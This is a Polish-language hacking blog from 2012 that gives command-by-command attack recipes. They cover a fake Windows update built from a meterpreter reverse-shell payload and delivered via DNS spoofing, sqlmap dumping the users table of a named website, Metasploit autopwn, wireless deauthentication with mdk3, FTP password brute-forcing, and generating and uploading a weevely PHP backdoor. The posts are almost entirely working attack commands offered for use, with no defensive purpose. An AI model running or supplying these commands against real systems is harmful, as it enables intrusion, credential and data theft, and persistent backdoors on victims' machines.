środa, 14 marca 2012

Falszywa Aktualizacja

msfconsole+apache2+ettercap(plugin dns_spoof)
Komendy:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=4444 x > /root/var/www/Windows-KB183905-x86-x64-PL.exe
kwrite /usr/share/ettercap/etter.dns
ettercap -T -q -i wlan0 -P dns_spoof -M arp // //
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.104
set LPORT 4444
exploit
jak ktos by chcial index.php i ikonke pw na forum :D
GAME OVER

SQL map

Automatyczny atak sql injection przy urzyciu sqlmap
Komendy:
cd /pentest/web/scanners/sqlmap
python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 --dbs
python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 -D pjirc_forum --tables
python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 -T users --columns
python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 -T users -U test --dump
i logujemy sie ;)
p.s
1. Backtrack 5 R1 - sqlmap
cd /pentest/database/sqlmap
video nie moje mam nadzieje ze autor sie nie obrazi a nawet jak sie obrazi to zrobimy nowe zapraszam na youtube channel: ruo911 pozdro

autopwn + PostgreSQL

Automatyczny atak msfcosole
Komendy:
msfconsole
db_status
db_hosts
db_nmap -sS -O 192.168.2.100
db_hosts
db_autopwn -p -r -e
sessions
sessions -i 1
(opcjonalnie) shell,shutdown,run vnc etc.
GAME OVER

wtorek, 13 marca 2012

MDK3

MDK3 wykopywanie usera(ow) z wlasnej sieci :D
Komendy:
iwconfig
airmon-ng start wlan1
airodump-ng mon0
airodump-ng --channel 1 mon0
mdk3 mon0 d -c 1 -b /root/Desktop/mac_urzyszkodnika
GAME OVER

msfconsole haking ftp + bonus weevely (generowanie zaszyfrowanego backdora)

msfconsole + weevely
Komendy:
ifconfig
nmap 192.168.2.*
msfconsole
use auxiliary/scanner/ftp/ftp_login
set USER_FILE Desktop/loginy.lst
set PASS_FILE Desktop/password.lst
set RHOSTS 192.168.2.100
set STOP_ON_SUCCESS true
run
cd /pentest/backdoors/web/weevely
./weevely.py generate 5m4ru /root/Desktop/backdors.php
wysylamy backdora na ftp (w moim przypadku filezilla)
./weevely.py http://192.168.2.100/backdors.php 5m4ru (podajemy scierzke url gdzie znajduje sie nasza furtak powodzenia ! )
GAME OVER